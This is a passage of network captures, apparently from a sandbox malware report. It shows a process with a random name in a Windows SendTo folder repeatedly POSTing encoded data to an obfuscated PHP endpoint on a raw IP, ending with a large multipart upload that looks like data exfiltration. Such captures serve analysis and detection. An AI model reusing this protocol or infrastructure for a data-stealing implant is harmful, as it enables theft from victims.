                                          Sep 13, 2024 21:02:39.677284956 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:40.087510109 CEST | 2532 | OUT | Data Raw: 5b 56 43 50 55 42 59 56 59 5f 51 51 52 58 54 56 5a 5d 5a 5f 55 54 53 42 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [VCPUBYVY_QQRXTVZ]Z_UTSBPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9(: "" !])+:<,)Z)80<?:$7&?C1,4';9[&!^-'
                                          Sep 13, 2024 21:02:40.313257933 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:40.444818974 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:40 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          11 | 192.168.2.4 | 56677 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:02:41.002789021 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:41.348377943 CEST | 2532 | OUT | Data Raw: 5e 52 43 57 50 43 59 51 59 5f 51 51 52 58 54 54 5a 5c 5a 5b 55 5e 53 41 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^RCWPCYQY_QQRXTTZ\Z[U^SAPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:(?1!1> #>81(/*)8$P+<-$34&7A%2;9[&!^-'
                                          Sep 13, 2024 21:02:41.745639086 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:41.893546104 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:41 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          12 | 192.168.2.4 | 56678 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:02:41.947532892 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2100
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:42.300791979 CEST | 2100 | OUT | Data Raw: 5e 55 46 52 50 41 59 5d 59 5f 51 51 52 50 54 56 5a 5a 5a 59 55 55 53 42 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^UFRPAY]Y_QQRPTVZZZYUUSBPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:(?% 2% 0=Y)-<&)4+,&$2?D17%9[&!^-
                                          Sep 13, 2024 21:02:42.699815989 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:42.830252886 CEST | 349 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:42 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 3a 0b 28 1f 3f 51 27 38 37 51 3b 3d 0c 50 26 2f 0d 05 2b 23 26 1b 29 2e 27 01 2d 5c 32 12 27 2b 21 5c 27 3c 0e 03 24 01 3b 50 3d 3a 2e 46 0d 1d 26 00 29 11 33 0c 29 58 3c 10 24 2e 29 5e 37 20 15 16 24 3f 38 0e 20 5a 3e 11 20 1c 2b 1e 25 2a 3d 5a 2d 26 2e 5f 3d 31 21 03 21 26 2e 55 0f 15 39 1b 26 0f 21 0e 3f 32 3b 5e 3e 01 25 0d 27 2f 0a 0c 32 02 2c 1a 30 06 26 52 32 3f 2e 05 25 22 3f 5c 3c 3e 25 56 21 31 2d 0b 35 11 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 98:(?Q'87Q;=P&/+#&).'-\2'+!\'<$;P=:.F&)3)X<$.)^7 $?8 Z> +%*=Z-&._=1!!&.U9&!?2;^>%'/2,0&R2?.%"?\<>%V!1-5'T#(V3YT0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          13 | 192.168.2.4 | 56680 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:02:42.111809969 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:42.457072020 CEST | 2532 | OUT | Data Raw: 5b 55 46 55 50 43 59 55 59 5f 51 51 52 58 54 57 5a 58 5a 5b 55 53 53 46 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [UFUPCYUY_QQRXTWZXZ[USSFPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9*/41973>(;9=?.+; Q+,Z%3$:E%2;9[&!^-'
                                          Sep 13, 2024 21:02:42.765607119 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:42.919722080 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:42 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          14 | 192.168.2.4 | 56681 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:02:43.635905027 CEST | 554 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:02:43.988373041 CEST | 2532 | OUT | Data Raw: 5e 54 46 53 55 4b 5c 56 59 5f 51 51 52 5d 54 54 5a 5f 5a 5f 55 56 53 46 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^TFSUK\VY_QQR]TTZ_Z_UVSFPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9B?! T54U&)+"S=/!Y)U("$ ,U2971#%;9[&!^-3
                                          Sep 13, 2024 21:02:44.372663975 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:44.525691032 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:44 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          15 | 192.168.2.4 | 56683 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:02:45.140120029 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:45.488323927 CEST | 2532 | OUT | Data Raw: 5e 51 43 5f 55 4a 59 51 59 5f 51 51 52 5a 54 55 5a 59 5a 5d 55 55 53 49 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^QC_UJYQY_QQRZTUZYZ]UUSIPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9+%#29X" =X)2W+)?-$'&?B%29[&!^-/
                                          Sep 13, 2024 21:02:45.874775887 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:46.010775089 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:45 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          16 | 192.168.2.4 | 56684 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:02:46.788984060 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:47.144715071 CEST | 2532 | OUT | Data Raw: 5e 55 46 53 55 4a 59 56 59 5f 51 51 52 5b 54 5b 5a 5f 5a 51 55 50 53 42 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^UFSUJYVY_QQR[T[Z_ZQUPSBPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:+?4"#9>&??+; Q?'#Q$9+% Z&9[&!^-+
                                          Sep 13, 2024 21:02:47.754014015 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:47.754252911 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:47 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          17 | 192.168.2.4 | 56685 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:02:47.838259935 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2084
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:48.191454887 CEST | 2084 | OUT | Data Raw: 5b 56 46 54 50 44 59 52 59 5f 51 51 52 5f 54 51 5a 5a 5a 5c 55 51 53 48 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [VFTPDYRY_QQR_TQZZZ\UQSHPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:*/"X!":4:*]&=?=[*$+/:3 &)'E1/(^19[&!^-;
                                          Sep 13, 2024 21:02:48.591243029 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:48.733670950 CEST | 349 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:48 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 3a 0b 28 08 01 55 33 5d 27 55 2c 2d 25 0b 24 3c 27 02 3f 0a 3a 19 2b 03 1d 02 2d 14 2a 59 27 2b 2a 04 24 2f 2f 1f 27 11 33 56 2a 00 2e 46 0d 1d 25 15 3d 01 3c 1f 29 58 2b 02 24 00 35 58 20 09 3b 17 25 3c 33 53 34 2c 2e 10 23 1c 0d 54 32 2a 3d 10 2f 1b 21 03 29 0f 2d 03 34 26 2e 55 0f 15 3a 0a 32 31 2d 0d 3c 32 24 01 29 2c 39 0d 32 2c 30 0f 26 38 2f 0e 27 38 2a 10 25 01 36 02 27 22 3f 5d 2a 3d 39 1d 21 21 0c 56 21 01 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 98:(U3]'U,-%$<'?:+-*Y'+*$//'3V*.F%=<)X+$5X ;%<3S4,.#T2*=/!)-4&.U:21-<2$),92,0&8/'8*%6'"?]*=9!!V!'T#(V3YT0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          18 | 192.168.2.4 | 56686 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:02:49.181514978 CEST | 554 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:02:49.535268068 CEST | 2532 | OUT | Data Raw: 5e 52 43 52 50 40 59 5c 59 5f 51 51 52 5c 54 54 5a 58 5a 5c 55 51 53 40 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^RCRP@Y\Y_QQR\TTZXZ\UQS@PXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9D(Y 9Y7.)+<>)(0Q<?:'#,U%+C%%+9[&!^-7
                                          Sep 13, 2024 21:02:49.943908930 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:50.102324009 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:49 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          19 | 192.168.2.4 | 56687 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:02:50.328262091 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:50.675854921 CEST | 2532 | OUT | Data Raw: 5b 54 43 56 55 40 5c 57 59 5f 51 51 52 5f 54 55 5a 5a 5a 51 55 51 53 46 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [TCVU@\WY_QQR_TUZZZQUQSFPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9<2 1^"#9\)+5?/*;(U+%$?&*?E&?<Y&+9[&!^-;
                                          Sep 13, 2024 21:02:51.100763083 CEST | 25 | IN | HTTP/1.1 100 Continue
                                          Sep 13, 2024 21:02:51.253108978 CEST | 200 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:02:51 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          20 | 192.168.2.4 | 56688 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:02:51.952894926 CEST | 578 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:52.300848961 CEST | 2532 | OUT | Data Raw: 5b 55 43 51 55 44 5c 57 59 5f 51 51 52 5a 54 53 5a 52 5a 50 55 54 53 43 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [UCQUD\WY_QQRZTSZRZPUTSCPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9+,* :7#.(;=?9*88?<.0+2;2 %+9[&!^-/


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          21 | 192.168.2.4 | 56689 | 31.177.108.211 | 80 | 8036 | C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 13, 2024 21:02:52.340390921 CEST | 624 | OUT | POST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=----laBTLt9kYlbCauPgGBWN8RSk4u1OCrMbUc
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 175938
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:02:53.101778984 CEST | 25 | IN | HTTP/1.1 100 Continue
